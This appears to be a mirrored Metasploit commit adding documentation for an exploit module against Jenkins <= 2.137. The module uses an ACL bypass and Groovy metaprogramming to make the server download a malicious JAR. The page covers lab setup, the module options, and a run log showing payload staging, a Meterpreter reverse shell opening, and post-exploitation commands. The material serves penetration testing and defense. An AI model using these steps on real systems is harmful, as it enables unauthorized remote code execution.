infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add module doc

master
William Vu 2019-03-16 00:39:22 -05:00
parent 621fa8e4db
commit b2c21c754f
1 changed files with 76 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

76
documentation/modules/exploit/multi/http/jenkins_metaprogramming.md Normal file
View File

@ -0,0 +1,76 @@
## Intro
This module exploits a vulnerability in Jenkins dynamic routing to
bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
download and execute a malicious JAR file.
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
on later versions of Jenkins.
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
## Setup
1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
3. Edit `run.sh` and change `2.152-alpine` to `2.137`
4. `./run.sh`
## Targets
```
Id Name
-- ----
0 Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
```
## Options
**RPORT**
Set this to the Jenkins port. The default is 8080.
**TARGETURI**
Set this to the Jenkins base path. The default is `/`.
**SRVPORT**
Set this to the port on which to serve the payload. Change it from 8080
to something like 8081 if you are testing Jenkins locally on port 8080.
**ForceExploit**
Set this to `true` to override the `check` result during exploitation.
## Usage
```
msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer : 6f21b8da2915
OS : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
```